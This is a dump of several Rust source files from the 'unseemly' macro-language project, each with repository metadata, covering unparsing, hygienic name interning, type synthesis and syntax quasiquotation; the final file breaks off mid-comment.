dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/unparse.rs
src/unparse.rs
use crate::{ ast::{Ast, AstContents, AstContents::*}, grammar::{ FormPat::{self, *}, SynEnv, }, name::*, util::mbe::EnvMBE, }; fn node_names_mentioned(pat: &FormPat) -> Vec<Name> { match *pat { Named(n, ref body) => { let mut res = node_names_mentioned(&*body); res.push(n); res } Scope(_, _) => vec![], Pick(_, _) => vec![], Star(ref body) | Plus(ref body) | NameImport(ref body, _) | NameImportPhaseless(ref body, _) | VarRef(ref body) | Literal(ref body, _) | QuoteDeepen(ref body, _) | QuoteEscape(ref body, _) | Common(ref body) | Reserved(ref body, _) => node_names_mentioned(&*body), Seq(ref sub_pats) | Alt(ref sub_pats) => { let mut res = vec![]; for pat in sub_pats { res.append(&mut node_names_mentioned(pat)); } res } Biased(ref lhs, ref rhs) => { let mut res = node_names_mentioned(&*lhs); res.append(&mut node_names_mentioned(&*rhs)); res } Anyways(_) | Impossible | Scan(_, _) | Call(_) | SynImport(_, _, _) => vec![], } } pub fn unparse_mbe(pat: &FormPat, actl: &AstContents, context: &EnvMBE<Ast>, s: &SynEnv) -> String { // HACK: handle underdetermined forms let undet = crate::ty_compare::underdetermined_form.with(|u| u.clone()); match actl { Node(form, body, _) if form == &undet => { return crate::ty_compare::unification.with(|unif| { let var = body.get_leaf_or_panic(&n("id")).to_name(); let looked_up = unif.borrow().get(&var).cloned(); match looked_up { // Apparently the environment is recursive; `{}`ing it stack-overflows Some(ref clo) => { format!("{} in some environment", clo.it /* , {:#?} clo.env */) } None => format!("¿{}?", var), } }); } _ => {} } // TODO: this really ought to notice when `actl` is ill-formed for `pat`. match (pat, actl) { (&Named(name, ref body), _) => { // TODO: why does the `unwrap_or` case happen once after each variable is printed? 
unparse_mbe(&*body, context.get_leaf(name).unwrap_or(&ast!((at ""))).c(), context, s) } (&Call(sub_form), _) => unparse_mbe(s.find_or_panic(&sub_form), actl, context, s), (&Anyways(_), _) | (&Impossible, _) => "".to_string(), (&Literal(_, n), _) => n.print(), (&Scan(_, _), &Atom(n)) => n.print(), (&Scan(_, _), _) => "".to_string(), // HACK for `Alt` (&VarRef(ref sub_form), &VariableReference(n)) => { unparse_mbe(&*sub_form, &Atom(n), context, s) } (&VarRef(_), _) => "".to_string(), // HACK for `Alt` (&Seq(ref sub_pats), _) => { let mut prev_empty = true; let mut res = String::new(); for sub_pat in sub_pats { let sub_res = unparse_mbe(&*sub_pat, actl, context, s); if !prev_empty && sub_res != "" { res.push(' '); } prev_empty = sub_res == ""; res.push_str(&sub_res); } res } (&Alt(ref sub_pats), _) => { let mut any_scopes = false; for sub_pat in sub_pats { if let Scope(_, _) = &**sub_pat { any_scopes = true; continue; } let sub_res = unparse_mbe(&*sub_pat, actl, context, s); if sub_res != "" { return sub_res; } // HACK: should use `Option` } // HACK: certain forms don't live in the syntax environment, // but "belong" under an `Alt`, so just assume forms know their grammar: if any_scopes { if let &Node(ref form_actual, ref body, _) = actl { return unparse_mbe(&*form_actual.grammar, actl, body, s); } } return "".to_string(); // Not sure if it's an error, or really just empty } (&Biased(ref lhs, ref rhs), _) => { format!("{}{}", unparse_mbe(lhs, actl, context, s), unparse_mbe(rhs, actl, context, s)) } (&Star(ref sub_pat), _) | (&Plus(ref sub_pat), _) => { let mut first = true; let mut res = String::new(); for marched_ctxt in context.march_all(&node_names_mentioned(&*sub_pat)) { if !first { res.push(' '); } first = false; res.push_str(&unparse_mbe(&*sub_pat, actl, &marched_ctxt, s)); } res } (&Scope(ref form, _), &Node(ref form_actual, ref body, _)) => { if form == form_actual { unparse_mbe(&*form.grammar, actl, body, s) } else { "".to_string() // HACK for `Alt` } } 
(&Scope(_, _), _) => "".to_string(), // Non-match (&Pick(ref body, _), _) | (&Common(ref body), _) => unparse_mbe(&*body, actl, context, s), (&NameImport(ref body, _), &ExtendEnv(ref actl_body, _)) => { unparse_mbe(&*body, actl_body.c(), context, s) } (&NameImport(_, _), _) => format!("[Missing import]→{:#?}←", actl), (&NameImportPhaseless(ref body, _), &ExtendEnvPhaseless(ref actl_body, _)) => { unparse_mbe(&*body, actl_body.c(), context, s) } (&NameImportPhaseless(_, _), _) => format!("[Missing import]±→{:#?}←±", actl), (&QuoteDeepen(ref body, _), &QuoteMore(ref actl_body, _)) => { unparse_mbe(&*body, actl_body.c(), context, s) } (&QuoteDeepen(_, _), _) => format!("[Missing qm]{:#?}", actl), (&QuoteEscape(ref body, _), &QuoteLess(ref actl_body, _)) => { unparse_mbe(&*body, actl_body.c(), context, s) } (&QuoteEscape(_, _), _) => format!("[Missing ql]{:#?}", actl), (&SynImport(ref _lhs_grammar, ref _rhs, _), &Node(_, ref actl_body, _)) => { // TODO: I think we need to store the LHS or the new SynEnv to make this pretty. format!("?syntax import? {}", actl_body) } (&SynImport(_, _, _), _) => "".to_string(), (&Reserved(ref body, _), _) => unparse_mbe(body, actl, context, s), } }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/name.rs
src/name.rs
#![macro_use] use std::{ cell::RefCell, collections::{HashMap, HashSet}, fmt, string::String, }; /// An interned, freshenable identifier. /// Generally, one creates names with `n()` (short for `Name::global()`); /// two names created this way with the same spelling will be treated as the same name. /// Hygiene comes from freshening (implemented in `alpha.rs`, invoked in `walk_mode.rs`). /// If a name is created in an unusual way that might cause it to collide, /// `Name::gensym()` ensures uniqueness. /// Only names that were copied or clone from the original will compare equal. #[derive(PartialEq, Eq, Clone, Copy, Hash)] pub struct Name { id: usize, } pub struct Spelling { // No two different variables have this the same. Tomatoes may have been added: unique: String, // The original spelling that the programmer chose. orig: String, } thread_local! { // From `Spelling.unique` to `id`s: static id_map: RefCell<HashMap<String, usize>> = RefCell::new(HashMap::new()); // From `id`s to `Spelling`s static spellings: RefCell<Vec<Spelling>> = RefCell::new(vec![]); static printables: RefCell<HashMap<usize, String>> = RefCell::new(HashMap::new()); // The values of `printables`, for lookup purposes. static printables_used: RefCell<HashSet<String>> = RefCell::new(HashSet::new()); // Should we do "naive" freshening for testing purposes? 
static fake_freshness: RefCell<bool> = RefCell::new(false); } impl crate::runtime::reify::Reifiable for Name { fn ty_name() -> Name { n("Name") } fn reify(&self) -> crate::runtime::eval::Value { val!(ast(at * self)) } fn reflect(v: &crate::runtime::eval::Value) -> Name { extract!((v) crate::runtime::eval::Value::AbstractSyntax = (ref ast) => ast.to_name()) } } impl std::cmp::PartialOrd for Name { fn partial_cmp(&self, other: &Name) -> Option<std::cmp::Ordering> { Some(self.orig_sp().cmp(&other.orig_sp())) } } impl std::cmp::Ord for Name { fn cmp(&self, other: &Name) -> std::cmp::Ordering { self.orig_sp().cmp(&other.orig_sp()) } } // These are for isolating tests of alpha-equivalence from each other. pub fn enable_fake_freshness(ff: bool) { fake_freshness.with(|fake_freshness_| { *fake_freshness_.borrow_mut() = ff; }) } // only available on nightly: // impl !Send for Name {} impl Name { /// Two names that are unequal to each other will have different "spelling"s. /// Tomatoes (🍅) may have been added to the end to ensure uniqueness. pub fn sp(self) -> String { spellings.with(|us| us.borrow()[self.id].unique.clone()) } /// The "original spelling" of a name; the string that was used to define it. These may collide. pub fn orig_sp(self) -> String { spellings.with(|us| us.borrow()[self.id].orig.clone()) } /// This extracts the "original" `Name`, prior to any freshening. /// This is probably not ever the *right* thing to do, but may be needed as a workaround. pub fn unhygienic_orig(self) -> Name { spellings.with(|us| Name::new(&us.borrow()[self.id].orig, false)) } /// Printable names are unique, like names from `sp()`, but generated lazily. /// So, if the compiler freshens some name a bunch of times, producing a tomato-filled mess, /// but only prints one version of the name, it gets to print an unadorned name. /// If absolutely necessary to avoid collision, carrots (🥕) are added to the end. 
pub fn print(self) -> String { printables.with(|printables_| { printables_used.with(|printables_used_| { printables_ .borrow_mut() .entry(self.id) .or_insert_with(|| { let mut print_version = self.orig_sp(); while printables_used_.borrow().contains(&print_version) { // Graffiti seen at Berkley: "EⒶT YOUR VEGETABLES 🥕" print_version = format!("{}🥕", print_version); } printables_used_.borrow_mut().insert(print_version.clone()); print_version.clone() }) .clone() }) }) } pub fn global(s: &str) -> Name { Name::new(s, false) } pub fn gensym(s: &str) -> Name { Name::new(s, true) } pub fn freshen(self) -> Name { Name::new(&self.orig_sp(), true) } fn new(orig_spelling: &str, freshen: bool) -> Name { let fake_freshness_ = fake_freshness.with(|ff| *ff.borrow()); id_map.with(|id_map_| { let mut unique_spelling = orig_spelling.to_owned(); // Find a fresh version by adding tomatoes, if requested: while freshen && id_map_.borrow().contains_key(&unique_spelling) { unique_spelling = format!("{}🍅", unique_spelling); } if freshen && fake_freshness_ { // Forget doing it right; only add exactly one tomato: unique_spelling = format!("{}🍅", orig_spelling); } let claim_id = || { spellings.with(|spellings_| { let new_id = spellings_.borrow().len(); spellings_.borrow_mut().push(Spelling { unique: unique_spelling.clone(), orig: orig_spelling.to_owned(), }); new_id }) }; // Claim our `unique_spelling` and a fresh ID: let id = *id_map_.borrow_mut().entry(unique_spelling.clone()).or_insert_with(claim_id); Name { id: id } }) } pub fn is(self, s: &str) -> bool { self.sp() == s } pub fn is_name(self, n: Name) -> bool { self.sp() == n.sp() } } impl From<&str> for Name { fn from(s: &str) -> Name { Name::global(s) } } impl From<&String> for Name { fn from(s: &String) -> Name { Name::global(&*s) } } // TODO: move to `ast_walk` // TODO: using `lazy_static!` (with or without gensym) makes some tests fail. Why? 
/// Special name for negative `ast_walk`ing pub fn negative_ret_val() -> Name { Name::global("⋄") } impl fmt::Debug for Name { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "«{}»", self.sp()) } } impl fmt::Display for Name { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.print()) } } pub fn n(s: &str) -> Name { Name::global(s) } #[test] fn name_interning() { // This test fails under tarpaulin; why? It must be related to `thread_local!` somehow... let a = n("a"); assert_eq!(a, a); assert_eq!(a, n("a")); assert_ne!(a, a.freshen()); assert_eq!(a, a.freshen().unhygienic_orig()); assert_ne!(a, n("x🍅")); assert_ne!(a.freshen(), a.freshen()); assert_ne!(a.freshen().sp(), a.freshen().sp()); assert_ne!(n("a"), n("y")); enable_fake_freshness(true); let x = n("x"); assert_eq!(x, x); assert_eq!(x, n("x")); assert_ne!(x, x.freshen()); // ... but now we the freshened version of `x` is accessible (and doesn't avoid existing names) assert_eq!(x.freshen(), n("x🍅")); assert_eq!(x.freshen(), x.freshen()); // Printable versions are first-come, first-served assert_eq!(a.freshen().print(), "a"); assert_eq!(a.print(), "a🥕"); }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/read.rs
src/read.rs
// TODO: This file should be absorbed into `grammar.rs`. custom_derive! { #[derive(Debug,PartialEq,Eq,Clone,Copy,Reifiable)] pub enum DelimChar { Paren, SquareBracket, CurlyBracket } } impl DelimChar { pub fn open(self) -> char { match self { Paren => '(', SquareBracket => '[', CurlyBracket => '{', } } pub fn close(self) -> char { match self { Paren => ')', SquareBracket => ']', CurlyBracket => '}', } } } use self::DelimChar::*; pub fn delim(s: &str) -> DelimChar { match s { "(" | ")" => Paren, "[" | "]" => SquareBracket, "{" | "}" => CurlyBracket, _ => icp!("not a delimiter!"), } }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/ty.rs
src/ty.rs
// Type synthesis is a recursive traversal of an abstract syntax tree. // It is compositional, // except for binding, which is indicated by ExtendTypeEnv nodes. // These nodes may depend on // the result of type-synthesizing sibling AST nodes // or the actual value of AST nodes corresponding to types // (i.e., type annotations). use crate::{ ast::*, ast_walk::{ walk, LazyWalkReses, WalkRule::{self}, }, form::Form, name::*, util::assoc::Assoc, walk_mode::WalkMode, }; use std::{fmt, rc::Rc}; impl Ast { // TODO: use this more // TODO: make `expd_form` a reference pub fn ty_destructure( &self, expd_form: Rc<Form>, loc: &Ast, ) -> Result<crate::util::mbe::EnvMBE<Ast>, TypeError> { self.destructure(expd_form.clone()) .ok_or(ty_err_val!(UnableToDestructure(self.clone(), expd_form.name) at loc /*TODO*/)) } } custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct SynthTy {} } custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct UnpackTy {} } impl WalkMode for SynthTy { fn name() -> &'static str { "SynTy" } type Elt = Ast; type Negated = UnpackTy; type AsPositive = SynthTy; type AsNegative = UnpackTy; type Err = TypeError; type D = crate::walk_mode::Positive<SynthTy>; type ExtraInfo = (); fn get_walk_rule(f: &Form) -> WalkRule<SynthTy> { f.synth_type.pos().clone() } fn automatically_extend_env() -> bool { true } fn walk_var( name: Name, parts: &crate::ast_walk::LazyWalkReses<SynthTy>, ) -> Result<Ast, TypeError> { match parts.env.find(&name) { None => Err(crate::util::err::sp(TyErr::UnboundName(name), parts.this_ast.clone())), // If name is protected, stop: Some(ty) if &VariableReference(name) == ty.c() => Ok(ty.clone()), Some(ref ty) => synth_type(ty, parts.env.clone()), } } // Simply protect the name; don't try to unify it. 
fn underspecified(name: Name) -> Ast { ast!((vr name)) } } impl WalkMode for UnpackTy { fn name() -> &'static str { "UnpTy" } type Elt = Ast; type Negated = SynthTy; type AsPositive = SynthTy; type AsNegative = UnpackTy; type Err = TypeError; type D = crate::walk_mode::Negative<UnpackTy>; type ExtraInfo = (); fn get_walk_rule(f: &Form) -> WalkRule<UnpackTy> { f.synth_type.neg().clone() } fn automatically_extend_env() -> bool { true } fn underspecified(name: Name) -> Ast { ast!((vr name)) } } impl crate::walk_mode::NegativeWalkMode for UnpackTy { fn needs_pre_match() -> bool { true } } pub fn synth_type_top(expr: &Ast) -> TypeResult { walk::<SynthTy>(expr, &LazyWalkReses::new_wrapper(Assoc::new())) } pub fn synth_type(expr: &Ast, env: Assoc<Name, Ast>) -> TypeResult { walk::<SynthTy>(expr, &LazyWalkReses::new_wrapper(env)) } pub fn neg_synth_type(pat: &Ast, env: Assoc<Name, Ast>) -> Result<Assoc<Name, Ast>, TypeError> { walk::<UnpackTy>(pat, &LazyWalkReses::new_wrapper(env)) } // TODO: Rename this. (Maybe `TypeComplaint`?) custom_derive! { #[derive(Reifiable, Clone, PartialEq)] pub enum TyErr { Mismatch(Ast, Ast), // got, expected LengthMismatch(Vec<Ast>, usize), NtInterpMismatch(Name, Name), NonexistentEnumArm(Name, Ast), NonexistentStructField(Name, Ast), NonExhaustiveMatch(Ast), UnableToDestructure(Ast, Name), UnboundName(Name), // TODO: the reification macros can't handle empty `enum` cases. Fix that! 
AnnotationRequired(()), NeedsDriver(()), // TODO: replace all uses of `Other` with more specific errors: Other(String) } } impl fmt::Display for TyErr { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { use self::TyErr::*; match *self { Mismatch(ref got, ref exp) => { write!(f, "[Mismatch] got:\n `{}`\n expected:\n `{}`\n", got, exp) } LengthMismatch(ref got, exp_len) => { write!(f, "[LengthMismatch] got:\n ")?; for g in got { write!(f, "{}, ", g)?; } write!(f, "\n expected {} arguments.\n", exp_len) } NtInterpMismatch(got, exp) => write!( f, "[NtInterpMismatch] expected the nonterminal `{}`, but `{}` was interpolated", exp, got ), NonexistentEnumArm(got_name, ref ty) => write!( f, "[NonexistentEnumArm] the enum `{}` doesn't have an arm named `{}`", ty, got_name ), NonexistentStructField(got_name, ref ty) => write!( f, "[NonexistentStructField] the struct `{}` doesn't have a field named `{}`", ty, got_name ), NonExhaustiveMatch(ref ty) => { write!(f, "[NonExhaustiveMatch] non-exhaustive match of `{}`", ty) } UnableToDestructure(ref ty, expected_name) => { write!(f, "[UnableToDestructure] expected a `{}` type, got `{}`", expected_name, ty) } UnboundName(name) => write!(f, "[UnboundName] `{}` is not defined", name), AnnotationRequired(()) => write!( f, "[AnnotationRequired] Negative syntax (e.g. a pattern) inside positive syntax \ (e.g. an expression) requires a type annotation." 
), NeedsDriver(()) => write!(f, "[NeedsDriver] Repetition needs a driver"), Other(ref s) => write!(f, "[Other] {}", s), } } } // temporary, until we get rid of `Debug` as the way of outputting errors impl fmt::Debug for TyErr { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { fmt::Display::fmt(self, f) } } // TODO: I hope I don't need this // impl From<()> for TyErr { // fn from(_: ()) -> TyErr { // panic!("Tried to discard a type error"); // } // } pub type TypeError = crate::util::err::Spanned<TyErr>; pub type TypeResult = Result<Ast, TypeError>; pub fn expect_type(expected: &Ast, got: &Ast, loc: &Ast) -> Result<(), TypeError> { if got != expected { Err(crate::util::err::Spanned { loc: loc.clone(), body: TyErr::Mismatch(expected.clone(), got.clone()), }) } else { Ok(()) } } #[test] fn basic_type_synth() { use crate::ast_walk::WalkRule::*; let mt_ty_env = Assoc::new(); let int_ty = ast!({ crate::core_forms::find_core_form("Type", "Int"); }); let nat_ty = ast!({ crate::core_forms::find_core_form("Type", "Nat"); }); let simple_ty_env = mt_ty_env.set(n("x"), int_ty.clone()); let body = basic_typed_form!(atom, Body(n("body")), NotWalked); let untypeable = basic_typed_form!(atom, NotWalked, NotWalked); assert_eq!(synth_type(&ast!((vr "x")), simple_ty_env.clone()), Ok(int_ty.clone())); assert_eq!( synth_type( &ast!({body.clone() ; ["irrelevant" => {untypeable.clone() ; }, "body" => (vr "x")]}), simple_ty_env.clone() ), Ok(int_ty.clone()) ); assert_eq!( synth_type( &ast!({body.clone() ; "type_of_new_var" => (, int_ty.clone()), "new_var" => "y", "body" => (import ["new_var" : "type_of_new_var"] (vr "y"))}), simple_ty_env.clone() ), Ok(int_ty.clone()) ); assert_eq!( synth_type( &ast!({ basic_typed_form!( atom, Custom(Rc::new(Box::new(|_| Ok(ast!({ crate::core_forms::find_core_form("Type", "Nat"); }))))), NotWalked ); [] }), simple_ty_env.clone() ), Ok(nat_ty.clone()) ); let chained_ty_env = assoc_n!("a" => ast!((vr "B")), "B" => ast!((vr "C")), "C" => ast!({"Type" 
"Int":})); assert_eq!(synth_type(&ast!((vr "a")), chained_ty_env), Ok(ast!({"Type" "Int":}))); } #[test] fn type_specialization() { let nat_ty = ast!( { "Type" "Nat" : }); fn tbn(nm: &'static str) -> Ast { ast!((vr nm)) } let _para_ty_env = assoc_n!( "some_int" => ast!( { "Type" "Int" : }), "convert_to_nat" => ast!({ "Type" "forall_type" : "param" => ["t"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [ (, tbn("t") ) ], "ret" => (, nat_ty.clone() ) })}), "identity" => ast!({ "Type" "forall_type" : "param" => ["t"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [ (, tbn("t") ) ], "ret" => (, tbn("t") ) })})); // assert_eq!(synth_type(&ast!({ "Expr" "apply" : // "rator" => (vr "convert_to_nat"), // "rand" => [ (vr "some_int") ] // }), para_ty_env.clone()), // Ok(ast!( { "Type" "Nat" : }))); // assert_eq!(synth_type(&ast!({ "Expr" "apply" : // "rator" => (vr "identity"), // "rand" => [ (vr "some_int") ] // }), para_ty_env.clone()), // Ok(ast!( { "Type" "Int" : }))); // TODO: test that ∀ X. ∀ Y. [ X → Y ] is a (sortof) sensible type (for transmogrify) // and that ∀ X. [ X → ∀ Y . Y ] is ridiculously permissive }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/core_qq_forms.rs
src/core_qq_forms.rs
use crate::{ ast, ast::{Ast, AstContents::*}, ast_walk::WalkRule::*, core_type_forms::{less_quoted_ty, more_quoted_ty, nt_is_positive, nt_to_type}, form::{Both, Form, Negative, Positive}, grammar::FormPat, name::*, runtime::eval::{Destructure, Eval, QQuote, QQuoteDestr}, util::assoc::Assoc, walk_mode::{NegativeWalkMode, WalkMode}, }; use std::rc::Rc; // == Types and syntax quotation: when are annotations needed? == // Expressions are "positive", and are traversed leaf-to-root in an environment, producing a type. // Patterns are "negative", and are traversed root-to-leaf from a type, producing an environment. // (`match` and `lambda` are examples of interactions between expressions and patterns.) // Syntax quotation and unquotation embeds expressions/patterns // (at a different phase, which matters suprisingly little) // inside expressions/patterns. // // This looks like: // pattern outside | expression outside <-- (provides context) // -------------------------------------- // pattern inside | ok | needs annotation // expression inside | bonus check | ok // // Examples of needed annotation: // // (frobnicate_pat '[Pat<List<Int>> | (cons a b)]') // In this case, we need to know the type of the syntax quote, // but the pattern also wants to know its own type so that it can tell us its environment. // // match stx { '[Expr | 1 + 5 * ,[Expr<Nat> | stx_num], ]' => ... } // In this case (looking at the expression interpolation), // we need to know the type of the interpolated expression syntax // (a pattern, even though it's a pattern *for* an expression) // in order to type-synthesize the arithmetic. // // // Examples of when we get to do a bonus typecheck: // // match stx { '[Expr | f x]' => ... } // In this case, we can check that the type of the scrutinee // (which is the type of the syntax quotation pattern) // equals `Expr< (whatever `f` returns) >`. // // optimize_expr '[Expr | match stx { ,[my_pat], => ... 
} ]' // In this case (looking at the Pat interpolation), // we can check that the type of the quoted scrutinee is the same as // the type of `my_pat` (after peeling off its `Pat<>`). // // Note that it doesn't matter whether the boundary is a quotation or an unquotation! // The phase only matters inasmuch as variables don't leave their phase. // There's a nice-seeming syntax for determining what `unquote` does when quotation is nested. // However, it would require some weird additional power for the parser: // '[Expr | '[Expr | ,[…], ,,[…],, ]']' // OTOH, if you are using `,,,,[],,,,`, something has gone terribly wrong. // == Opacity! == // Basically, ` ,[Expr<T> | a ], ` dumps an expression with the type `T` into the type checker, // but at a different phase from where `T` was defined. // We don't want to capture the whole environment, // so we want the typechecker to treat `T` opaquely (i.e. without looking up), // which is what "mu_type" does. // This walk installs (or removes) "mu_type"s on any free variables fn adjust_opacity(t: &Ast, env: Assoc<Name, Ast>, delta: i32) -> Ast { let ctxt = crate::ast_walk::LazyWalkReses { extra_info: delta, ..crate::ast_walk::LazyWalkReses::new_wrapper(env) }; crate::ast_walk::walk::<MuProtect>(t, &ctxt).unwrap() } fn remove_opacity(t: &Ast, delta: i32) -> Ast { if delta > 0 { icp!() } // The environment doesn't matter when removing opacity adjust_opacity(t, Assoc::new(), delta) } // This walk is for one very simple purpose: to add `mu` around unbound names. custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct MuProtect {} } // Sadly, we have to define a negative version, even though it's never used. custom_derive! 
{ #[derive(Copy, Clone, Debug, Reifiable)] pub struct UnusedNegativeMuProtect {} } fn change_mu_opacity(parts: crate::ast_walk::LazyWalkReses<MuProtect>) -> Result<Ast, ()> { let delta = parts.extra_info; let opacity = &parts .maybe_get_term(n("opacity_for_different_phase")) .map(|a| a.to_name().sp().parse::<i32>().unwrap()); if let Some(opacity) = opacity { if opacity + delta < 0 { icp!("unwrapped too far") } if opacity + delta == 0 { return Ok(crate::core_forms::strip_ee(&parts.get_term(n("body"))).clone()); } } Ok(parts.this_ast.c_map(&|c| match c { ast::Node(f, mu_parts, export) => { let mut mu_parts = mu_parts.clone(); if let Some(opacity) = opacity { mu_parts.add_leaf( n("opacity_for_different_phase"), ast!((at n(&(opacity + delta).to_string()))), ); } ast::Node(f.clone(), mu_parts, export.clone()) } _ => icp!(), })) } impl WalkMode for MuProtect { fn name() -> &'static str { "MProt" } type Elt = Ast; type Negated = UnusedNegativeMuProtect; type AsPositive = MuProtect; type AsNegative = UnusedNegativeMuProtect; type Err = (); type D = crate::walk_mode::Positive<MuProtect>; type ExtraInfo = i32; fn get_walk_rule(f: &Form) -> crate::ast_walk::WalkRule<MuProtect> { if f.name == n("mu_type") { cust_rc_box!(change_mu_opacity) } else { LiteralLike } } fn automatically_extend_env() -> bool { true } fn walk_var(name: Name, parts: &crate::ast_walk::LazyWalkReses<MuProtect>) -> Result<Ast, ()> { if parts.extra_info <= 0 { return Ok(ast!((vr name))); } if parts.env.find(&name) == None { return Ok(ast!({"Type" "mu_type" : "opacity_for_different_phase" => (at &parts.extra_info.to_string()), "param" => [(import [prot "param"] (vr name))], "body" => (import [* [prot "param"]] (vr name))})); } else { return Ok(ast!((vr name))); } } // TODO: it seems like we always need to define this; think about this more. 
fn underspecified(name: Name) -> Ast { ast!((vr name)) } } impl WalkMode for UnusedNegativeMuProtect { fn name() -> &'static str { "XXXXX" } type Elt = Ast; type Negated = MuProtect; type AsPositive = MuProtect; type AsNegative = UnusedNegativeMuProtect; type Err = (); type D = crate::walk_mode::Negative<UnusedNegativeMuProtect>; type ExtraInfo = i32; fn get_walk_rule(_: &Form) -> crate::ast_walk::WalkRule<UnusedNegativeMuProtect> { icp!() } fn automatically_extend_env() -> bool { icp!() } } impl NegativeWalkMode for UnusedNegativeMuProtect { fn needs_pre_match() -> bool { panic!() } } // Technically, we could have the parser decide whether `unquote` is allowed. // (It only makes sense inside a `quote`.) // However, this would leave us with one `unquote` form available per level of quotation /// Generate a (depth-1) unquoting form. /// `pos_quot` is true iff the quotation itself (and thus the interpolation) is positive. pub fn unquote(nt: Name, pos_quot: bool) -> Rc<FormPat> { Rc::new(FormPat::Scope( unquote_form(nt, pos_quot, 1), if pos_quot { crate::beta::ExportBeta::Nothing } else { crate::beta::ExportBeta::Use(n("body")) }, )) } pub fn unquote_form(nt: Name, pos_quot: bool, depth: u8) -> Rc<Form> { let form_delim_start = &format!("{}[", ",".repeat(depth as usize)); Rc::new(Form { name: n("unquote"), grammar: // It's a pain to determine whether type annotation is needed at syntax time, // so it's optional Rc::new(if pos_quot { form_pat!((delim form_delim_start, "[", [(named "nt", (anyways (vr nt))), (alt [], [(name_lit__by_name nt), (call "DefaultSeparator"), (scan r"(<)"), (named "ty_annot", (call "Type")), (call "DefaultSeparator"), (scan r"(>)"), (lit "|")]), (named "body", (-- depth (call "Expr")))])) } else { form_pat!((delim form_delim_start, "[", [(named "nt", (anyways (vr nt))), (alt [], [(name_lit__by_name nt), (call "DefaultSeparator"), (scan r"(<)"), (named "ty_annot", (call "Type")), (call "DefaultSeparator"), (scan r"(>)"), (lit "|")]), (named 
"body", (-- depth (call "Pat")))])) }), type_compare: Positive(NotWalked), // this is not a type form synth_type: // `nt_is_positive` and `pos_quot` have opposite roles from `quote` if nt_is_positive(nt) { // For example: (this quotation could be positive or negative) // (nt_is_positive is true in this example, though) // ` '[Expr | .[a : Int . ,[Expr<String> | body], ]. ]' ` // ^^^^^^^^^^^^^^^^^^^^^^^ Positive( // `body` has the type `Expr<String>` (annotation is superfluous): cust_rc_box!( move | unquote_parts | { let ast_for_errors = unquote_parts.get_term(n("body")); let res = if pos_quot { // TODO: check annotation if present let mut res = unquote_parts.get_res(n("body"))?; // `Expr<String>` for _ in 0..(depth-1) { res = less_quoted_ty(&res, None, &ast_for_errors)?; } // HACK: we only know the last `nt` to expect less_quoted_ty(&res, Some(nt), &ast_for_errors)? } else { // need a type annotation if !unquote_parts.has(n("ty_annot")) { ty_err!(AnnotationRequired (()) at unquote_parts.this_ast); } let expected_type = unquote_parts.get_res(n("ty_annot"))?; let mut ctxt_elt = expected_type.clone(); for _ in 0..(depth-1) { unimplemented!("We may need a stack of what NTs are quoted") } ctxt_elt = more_quoted_ty(&ctxt_elt, nt); let negative_parts = unquote_parts.switch_mode::<crate::ty::UnpackTy>(); let _res = negative_parts.with_context(ctxt_elt).get_res(n("body"))?; expected_type }; Ok(adjust_opacity(&res, unquote_parts.env, i32::from(depth))) })) } else { // For example: ` '[Pat | (x, ,[Pat<String> | body], ) ]' ` // ^^^^^^^^^^^^^^^^^^^^^^ Negative( cust_rc_box!( move | unquote_parts | { let ast_for_errors = unquote_parts.get_term(n("body")); let ctxt_elt = remove_opacity(unquote_parts.context_elt(), -(i32::from(depth))); let mut ctxt_elt = ctxt_elt; for _ in 0..(depth-1) { unimplemented!("We may need a stack of what NTs are quoted") } ctxt_elt = more_quoted_ty(&ctxt_elt, nt); if pos_quot { // `String` let lq_parts = 
unquote_parts.switch_mode::<crate::ty::SynthTy>(); let res = lq_parts.get_res(n("body"))?; // Bonus typecheck ty_exp!(&ctxt_elt, &res, ast_for_errors); Ok(Assoc::new()) // TODO: this seems like it shouldn't be empty } else { // phase-shift the context_elt: let _res = unquote_parts.with_context(ctxt_elt).get_res(n("body"))?; Ok(Assoc::new()) // TODO: does this make sense? } }) ) }, // Also, let's suppose that we have something like: // let some_pattern : pat<int> = ... // let s = '[{pat} struct { a: ,[ some_pattern ], b: b_var} ]' // ...what then? eval: Both(NotWalked, NotWalked), // Outside a quotation? Makes no sense! quasiquote: // TODO #26: this and "dotdotdot" are the only forms that *aren't* `LiteralLike` Both( // TODO: double-check that `pos` and `neg` don't matter here cust_rc_box!( move | unquote_parts | { let lq_parts = unquote_parts.switch_mode::<Eval>(); crate::ast_walk::walk::<Eval>(lq_parts.get_term_ref(n("body")), &lq_parts) }), cust_rc_box!( move | unquote_parts | { let context = unquote_parts.context_elt().clone(); let lq_parts = unquote_parts.switch_mode::<Destructure>(); crate::ast_walk::walk::<Destructure>(lq_parts.get_term_ref(n("body")), &lq_parts.with_context(context)) })) }) } // Macro By Example transcription. TODO: currently positive-only // There are two parts to the way that Macro By Example works in Unseemly. // // The first is the types and how to construct them: // If `T` is `**[Int Float]**, // then `:::[T >> Expr<T> ]:::` is 